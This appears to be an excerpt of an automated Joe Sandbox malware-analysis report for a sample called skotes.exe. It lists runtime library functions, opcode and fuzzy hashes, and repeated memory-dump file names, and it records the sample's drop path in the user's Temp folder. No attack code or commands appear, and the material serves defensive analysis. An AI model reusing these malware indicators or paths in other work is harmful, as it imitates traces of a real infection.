Associated: 00000006.00000002.2975930946.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976189209.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976880868.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977217260.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977562118.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977779299.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977998863.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978168524.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978390609.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_940000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
String ID:
API String ID: 78362717-0
Opcode ID: ed5c3284882ece478fbb3367f1f8f5dbd69f78bf790bb9c4c006e6817b181867
Instruction ID: 103918d03685ac2a1430205f3a30b8fef0ef0728bb77f241c5818064c2d21a74
Opcode Fuzzy Hash: ed5c3284882ece478fbb3367f1f8f5dbd69f78bf790bb9c4c006e6817b181867
Instruction Fuzzy Hash: CC01D633600514B7CF2AEE648841FAF77ADDF84750F10C455FC1AAB292DA71EE00A7A0

Function 00969510 Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 00969519

Part of subcall function 0095F4CB: Concurrency::details::SchedulerBase::GetDefaultScheduler.LIBCONCRT ref: 00965486

Concurrency::details::ContextBase::CancelCollection.LIBCONCRT ref: 0096953D
Concurrency::details::_TaskCollectionBase::_FinishCancelState.LIBCMT ref: 00969550
Concurrency::details::ContextBase::CancelStealers.LIBCMT ref: 00969559

Memory Dump Source

Source File: 00000006.00000002.2960262313.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000006.00000002.2959959469.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2960262313.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963225351.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963895265.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2964785557.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966475323.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966741111.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967559238.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967788512.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967968423.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968262430.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968402647.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968707394.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2969551208.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970023802.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970506072.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970863169.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971131605.0000000000B63000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971393726.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971653636.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971851409.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972152564.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972407654.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972592296.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972777856.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972998935.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973179747.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973392344.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973608752.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973780405.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974000799.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974168686.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974364643.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974575970.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974786379.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974992299.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975203667.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975337697.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975539261.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975712668.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975930946.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976189209.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976880868.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977217260.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977562118.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977779299.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977998863.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978168524.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978390609.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_940000_skotes.jbxd

Yara matches

Similarity

API ID: Base::Concurrency::details::$CancelContextScheduler$Collection$Base::_Concurrency::details::_CurrentDefaultFinishStateStealersTask
String ID:
API String ID: 218105897-0
Opcode ID: 4615e97fafe502f6002d1074aebf71b8ed261496fd89dd89418fafc456e0ff3f
Instruction ID: ba0ca87529ab2e69d7e90f14d834eab0968bc206beef244b6389aa7b68efb364
Opcode Fuzzy Hash: 4615e97fafe502f6002d1074aebf71b8ed261496fd89dd89418fafc456e0ff3f
Instruction Fuzzy Hash: CAF03071600B209FE672AB698811F6B239D9FC4715F00C41EF95B9B282CF75E946CB91

Function 0095EFCD Relevance: 6.0, APIs: 4, Instructions: 20COMMON

Download Yara Rule

APIs

Concurrency::critical_section::unlock.LIBCMT ref: 0095EFD1

Part of subcall function 0095F968: Concurrency::details::LockQueueNode::WaitForNextNode.LIBCMT ref: 0095F989
Part of subcall function 0095F968: Concurrency::details::LockQueueNode::WaitForNextNode.LIBCMT ref: 0095F9C0
Part of subcall function 0095F968: Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 0095F9CC

Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 0095EFDD

Part of subcall function 0095F40F: Concurrency::critical_section::unlock.LIBCMT ref: 0095F433

Concurrency::Context::Block.LIBCONCRT ref: 0095EFE2

Part of subcall function 00960366: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 00960368

Concurrency::critical_section::lock.LIBCONCRT ref: 0095F002

Part of subcall function 0095F891: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 0095F8AC
Part of subcall function 0095F891: Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 0095F8B7

Memory Dump Source

Source File: 00000006.00000002.2960262313.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000006.00000002.2959959469.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2960262313.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963225351.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963895265.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2964785557.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966475323.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966741111.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967559238.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967788512.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967968423.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968262430.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968402647.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968707394.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2969551208.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970023802.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970506072.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970863169.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971131605.0000000000B63000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971393726.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971653636.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971851409.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972152564.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972407654.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972592296.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972777856.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972998935.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973179747.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973392344.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973608752.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973780405.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974000799.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974168686.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974364643.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974575970.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974786379.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974992299.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975203667.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975337697.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975539261.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975712668.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975930946.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976189209.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976880868.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977217260.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977562118.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977779299.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977998863.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978168524.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978390609.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_940000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$LockNodeNode::Queue$Concurrency::critical_section::_Concurrency::critical_section::unlockNextWait$Acquire_lockBase::BlockConcurrency::Concurrency::critical_section::lockConcurrency::details::_ContextContext::CurrentDerefLock::_ReaderSchedulerScoped_lockScoped_lock::~_Switch_to_activeTimerWriter
String ID:
API String ID: 811866635-0
Opcode ID: b9bfca0dec9dad13279b0544c9a1e78cca843ab6a6e1d8cf14be6515004ecf37
Instruction ID: 6145e21b4545b3944e60f8d3ab562d019964e16866aada0876cee35cd6723b47
Opcode Fuzzy Hash: b9bfca0dec9dad13279b0544c9a1e78cca843ab6a6e1d8cf14be6515004ecf37
Instruction Fuzzy Hash: E4E0DF31900500ABCB08FB20C4B57ADBB61BFC0361B008319E8B2172E2CF346E4ACB80

Function 0097DFE3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 85COMMON

Download Yara Rule

Strings

C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, xrefs: 0097DFE8

Memory Dump Source

Source File: 00000006.00000002.2960262313.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000006.00000002.2959959469.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2960262313.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963225351.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963895265.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2964785557.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966475323.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966741111.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967559238.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967788512.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967968423.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968262430.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968402647.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968707394.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2969551208.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970023802.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970506072.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970863169.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971131605.0000000000B63000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971393726.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971653636.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971851409.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972152564.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972407654.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972592296.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972777856.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972998935.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973179747.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973392344.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973608752.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973780405.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974000799.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974168686.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974364643.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974575970.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974786379.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974992299.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975203667.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975337697.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975539261.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975712668.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975930946.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976189209.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976880868.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977217260.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977562118.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977779299.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977998863.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978168524.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978390609.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_940000_skotes.jbxd

Yara matches

Similarity

API ID:
String ID: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
API String ID: 0-1793179972
Opcode ID: 65cfc2fa10122b0396c2f51ea03d7a97f3ee95cd697238ae7a755a559f7ec189
Instruction ID: 1d4ac7e074f462f061e727e9414934f44ba3cc53045157cc30a1a3e5b061effb
Opcode Fuzzy Hash: 65cfc2fa10122b0396c2f51ea03d7a97f3ee95cd697238ae7a755a559f7ec189
Instruction Fuzzy Hash: 072184736082097FEB30AF659C81F6BB7ADEF44368710C555F92C97151E761ED008760

Function 00971704 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

Concurrency::details::FreeVirtualProcessorRoot::SpinUntilIdle.LIBCONCRT ref: 00971764
std::invalid_argument::invalid_argument.LIBCONCRT ref: 009717AF

Strings

pContext, xrefs: 009717A7

Memory Dump Source

Source File: 00000006.00000002.2960262313.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000006.00000002.2959959469.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2960262313.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963225351.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963895265.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2964785557.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966475323.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966741111.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967559238.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967788512.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967968423.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968262430.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968402647.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968707394.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2969551208.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970023802.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970506072.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970863169.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971131605.0000000000B63000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971393726.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971653636.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971851409.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972152564.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972407654.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972592296.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972777856.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972998935.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973179747.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973392344.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973608752.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973780405.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974000799.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974168686.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974364643.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974575970.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974786379.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974992299.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975203667.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975337697.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975539261.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975712668.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975930946.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976189209.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976880868.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977217260.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977562118.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977779299.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977998863.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978168524.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978390609.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_940000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::FreeIdleProcessorRoot::SpinUntilVirtualstd::invalid_argument::invalid_argument
String ID: pContext
API String ID: 3390424672-2046700901
Opcode ID: d07bf554d1e664330ff4ae3e15f4edc0031392932bca8711ffb8e3c218a13d07
Instruction ID: 84f07ed5a19143b05f38f100c4b5387b49a958181ce4ab2a714346bd98b51fcb
Opcode Fuzzy Hash: d07bf554d1e664330ff4ae3e15f4edc0031392932bca8711ffb8e3c218a13d07
Instruction Fuzzy Hash: 3111A237A002149BCF19AF2CC48566D7769AFC4364B158065E81AA7281DB74DD05CAD1

Function 0096B92C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28threadCOMMON

Download Yara Rule

APIs

Concurrency::details::FreeThreadProxy::ReturnIdleProxy.LIBCONCRT ref: 0096B94E
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0096B961

Strings

pContext, xrefs: 0096B959

Memory Dump Source

Source File: 00000006.00000002.2960262313.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000006.00000002.2959959469.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2960262313.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
